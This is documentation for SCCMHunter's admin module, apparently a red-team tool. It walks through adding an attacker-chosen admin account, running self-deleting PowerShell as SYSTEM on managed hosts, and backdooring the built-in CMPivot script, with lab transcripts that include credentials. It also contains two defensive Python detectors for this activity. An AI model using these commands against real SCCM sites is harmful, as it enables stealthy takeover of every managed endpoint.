Admin Management Commands
add_admin
Description
Add a provided account as a site server admin. This is useful for the scripts module when SCCM is configured to require a secondary account for script approval (the default setting). The account does not have to be a traditional user account; it can also be a machine account.
Usage
add_admin [username] [sid]
Example
() (C:\) >> show_admins
[22:47:42] INFO Tasked SCCM to list current SMS Admins.
[22:47:43] INFO Current Full Admin Users:
[22:47:43] INFO LAB\Administrator
() (C:\) >> add_admin lowpriv S-1-5-21-4004054868-2969153893-1580793631-1113
[22:47:47] INFO Tasked SCCM to add lowpriv as an administrative user.
[22:47:49] INFO [+] Successfully added lowpriv as an admin.
() (C:\) >> show_admins
[22:47:51] INFO Tasked SCCM to list current SMS Admins.
[22:47:52] INFO Current Full Admin Users:
[22:47:52] INFO LAB\Administrator
[22:47:52] INFO lowpriv
() (C:\) >>
delete_admin
Description
Remove a target administrator account from SCCM. Note: this command cannot be run against the account you are operating as.
Usage
You cannot remove your own administrative account using this command.
show_admins
Description
Show the current SCCM admin accounts.
Usage
Example
() C:\ >> show_admins
[22:13:53] INFO Tasked SCCM to list current SMS Admins.
[22:13:53] INFO Current Full Admin Users:
[22:13:53] INFO LAB\Administrator
() (C:\) >>
show_rbac
Description
List users and their roles within the SCCM RBAC system.
Usage
show_consoleconnections
Description
List console sessions and their source connections.
Usage
Script Management Commands
script
Description
Execute a provided PowerShell script on a target host. The script is designed to delete itself from both the remote host and the site database. If the hierarchy is configured to require script approval (the default), alternate credentials must be specified to approve the script. Alternate credentials can be obtained by using the add_admin command to add a secondary account as an administrator.
Usage
Examples
Script approval not required
When script approval is not required, scripts execute directly.
Script approval required
When script approval is required, you need alternate credentials.
Script execution fails without alternate credentials:
(16777221) (C:\) >> script /root/test.txt
[22:57:31] INFO [+] Updates script created successfully with GUID c6006c4a-5590-4cac-9b49-48b86e80064f.
[22:57:35] INFO [-] Hierarchy settings do not allow author's to approve their own scripts. All custom script execution will fail.
[22:57:35] INFO [*] Try using alternate approval credentials.
[22:57:38] INFO [+] Script with GUID c6006c4a-5590-4cac-9b49-48b86e80064f deleted.
(16777221) (C:\) >>
Exit, restart with alternate approval credentials, and run the script again:
(16777221) (C:\) >> exit
┌──(root㉿kali)-[/opt/sccmhunter]
└─# python3 sccmhunter.py admin -u lab\\administrator -p P@ssw0rd -ip 10.10.100.9 -au lowpriv -ap P@ssw0rd -debug
SCCMHunter vdev0.0.3 by @garrfoster
[14:13:07] DEBUG [*] Database built.
[14:13:07] INFO [!] Enter help for extra shell commands
() C:\ >> shell nano /root/test.txt
() (C:\) >> interact 16777221
(16777221) (C:\) >> script /root/test.txt
[14:13:36] INFO [+] Updates script created successfully with GUID 405cde91-bb42-4d2f-9acd-7b3b3789ccd4.
[14:13:36] DEBUG [*] Using alternate credentials to approve script.
[14:13:38] INFO [+] Script with guid 405cde91-bb42-4d2f-9acd-7b3b3789ccd4 approved.
[14:13:40] INFO [+] Script with guid 405cde91-bb42-4d2f-9acd-7b3b3789ccd4 executed.
[14:13:40] DEBUG [+] Got OperationID: 16779568
[14:13:58] INFO [+] Got result:
[14:13:58] INFO nt authority\\system
[14:13:59] INFO [+] Script with GUID 405cde91-bb42-4d2f-9acd-7b3b3789ccd4 deleted.
(16777221) (C:\) >>
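From the defender's side, the lifecycle shown above (a script created, approved by a recently added admin, run, and deleted within seconds) is worth alerting on. The following Python is an added example, not part of SCCMHunter; the event schema, action names, thresholds and sample records are constructed for illustration and are not real SCCM status messages.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed audit records: (time, action, actor, target). The schema is an
# assumption for this example, not the format of real SCCM status messages.
SAMPLE = [
    ("2024-02-01 09:00:00", "script_create",  "LAB\\alice", "guid-A"),
    ("2024-02-02 10:30:00", "script_approve", "LAB\\bob", "guid-A"),
    ("2024-02-07 22:47:47", "admin_add",      "LAB\\Administrator", "LAB\\lowpriv"),
    ("2024-02-07 22:57:31", "script_create",  "LAB\\Administrator", "guid-B"),
    ("2024-02-07 22:57:38", "script_delete",  "LAB\\Administrator", "guid-B"),
    ("2024-02-08 14:13:36", "script_create",  "LAB\\Administrator", "guid-C"),
    ("2024-02-08 14:13:38", "script_approve", "LAB\\lowpriv", "guid-C"),
    ("2024-02-08 14:13:40", "script_run",     "LAB\\Administrator", "guid-C"),
    ("2024-02-08 14:13:59", "script_delete",  "LAB\\Administrator", "guid-C"),
]

def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")

def find_suspicious_scripts(events, max_lifetime=timedelta(minutes=5),
                            new_admin_window=timedelta(days=7)):
    """Return {guid: [reasons]} for scripts matching the lifecycle above."""
    admin_added = {}             # account -> time it was granted admin
    scripts = defaultdict(dict)  # guid -> {action: (time, actor)}
    for ts, action, actor, target in sorted(events, key=lambda e: parse(e[0])):
        when = parse(ts)
        if action == "admin_add":
            admin_added[target] = when
        else:
            scripts[target].setdefault(action, (when, actor))
    findings = {}
    for guid, acts in scripts.items():
        reasons = []
        created, deleted = acts.get("script_create"), acts.get("script_delete")
        approved = acts.get("script_approve")
        # Rule 1: script removed from the site shortly after it was created.
        if created and deleted and deleted[0] - created[0] <= max_lifetime:
            reasons.append("short-lived")
        # Rule 2: approver only became an admin recently.
        if approved:
            granted = admin_added.get(approved[1])
            if granted and timedelta(0) <= approved[0] - granted <= new_admin_window:
                reasons.append("approved-by-new-admin")
        if reasons:
            findings[guid] = reasons
    return findings
```

On the constructed sample, the long-lived script approved by an established admin is not flagged, the failed attempt is flagged as short-lived, and the approved run is flagged by both rules.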
list_scripts
Description
List scripts stored on the SCCM server.
Usage
delete_script
Description
Delete a script from the SCCM server using its GUID.
Usage
CMPivot Script Management Commands
The following CMPivot script management commands are still in beta and not recommended for use in production environments.
backup
Description
Performs a backup of the existing built-in CMPivot script. Required prior to any manipulation of the CMPivot script.
Usage
Example
(16777221) (C:\Users\) >> shell ls -l /root/.sccmhunter/logs/
total 232
-rw-r--r-- 1 root root 214176 Feb 7 23:35 console.log
drwxr-xr-x 2 root root 4096 Feb 6 22:02 csvs
drwxr-xr-x 2 root root 4096 Feb 7 19:59 db
drwxr-xr-x 2 root root 4096 Feb 6 22:02 json
drwxr-xr-x 2 root root 4096 Feb 6 22:02 loot
(16777221) (C:\Users\) >> backup
[23:38:11] INFO Tasked SCCM to backup the CMPivot script.
[23:38:14] INFO [+] Backup created successfully.
(16777221) (C:\Users\) >> shell ls -l /root/.sccmhunter/logs/
total 280
-rw-r--r-- 1 root root 48651 Feb 7 23:38 cmpivot_backup.ps1
-rw-r--r-- 1 root root 214176 Feb 7 23:35 console.log
drwxr-xr-x 2 root root 4096 Feb 6 22:02 csvs
drwxr-xr-x 2 root root 4096 Feb 7 19:59 db
drwxr-xr-x 2 root root 4096 Feb 6 22:02 json
drwxr-xr-x 2 root root 4096 Feb 6 22:02 loot
backdoor
Description
Replace the built-in CMPivot script stored in the site server database with a user-supplied script. This command will not run unless a backup of the script exists, so that the operator can restore the original afterwards.
Usage
backdoor [/path/to/script]
Example
(16777221) (C:\Users\) >> backdoor /root/test.txt
[23:34:54] INFO Tasked SCCM to backdoor CMPivot with provided script
IMPORTANT: Did you backup the script first? There is no going back without it. Y/N?Y
[23:34:59] INFO [+] CMPivot script updated successfully.
[23:35:01] INFO [+] CMPivot script approved.
restore
Description
Restore a modified CMPivot script to its previous state.
Usage
Example
(16777221) (C:\Users\) >> restore
[23:35:05] INFO Tasked SCCM to restore the original CMPivot script.
[23:35:06] INFO [+] CMPivot script updated successfully.
[23:35:07] INFO [+] CMPivot script approved.
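Because restore puts the original body back, a point-in-time hash comparison of the built-in CMPivot script passes once it has run; an integrity check has to look at the script's history. The following Python is an added example, not part of SCCMHunter; it assumes periodic snapshots of the script body are available (how they are collected is outside the example), and the snapshot contents and times are constructed.

```python
import hashlib

def digest(body: str) -> str:
    return hashlib.sha256(body.encode("utf-8")).hexdigest()

def tamper_windows(baseline_body, snapshots):
    """snapshots: [(timestamp, script_body)], oldest first.

    Returns (windows, still_modified). Each window is
    (first_seen_modified, first_seen_restored_or_None, sha256_of_modified_body).
    """
    good = digest(baseline_body)
    windows, open_start, open_hash = [], None, None
    for ts, body in snapshots:
        h = digest(body)
        if h != good and open_start is None:
            # Body first differs from the known-good baseline.
            open_start, open_hash = ts, h
        elif h != good and h != open_hash:
            # Replaced again with different content: close and reopen.
            windows.append((open_start, ts, open_hash))
            open_start, open_hash = ts, h
        elif h == good and open_start is not None:
            # Baseline body is back: the modification window closes here.
            windows.append((open_start, ts, open_hash))
            open_start = open_hash = None
    if open_start is not None:
        windows.append((open_start, None, open_hash))
    return windows, open_start is not None

# Constructed snapshots mirroring the backdoor/restore timestamps above.
ORIGINAL = "# built-in CMPivot script body (placeholder)\n"
SNAPSHOTS = [
    ("23:30:00", ORIGINAL),
    ("23:34:59", "# replaced body (placeholder)\n"),
    ("23:35:06", ORIGINAL),
]

if __name__ == "__main__":
    windows, still_modified = tamper_windows(ORIGINAL, SNAPSHOTS)
    print("still modified:", still_modified)
    for start, end, h in windows:
        print(f"modified from {start} until {end}: sha256={h}")
```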
Administrative tasks require appropriate SCCM permissions. Script operations may require alternate approval credentials depending on your SCCM hierarchy configuration.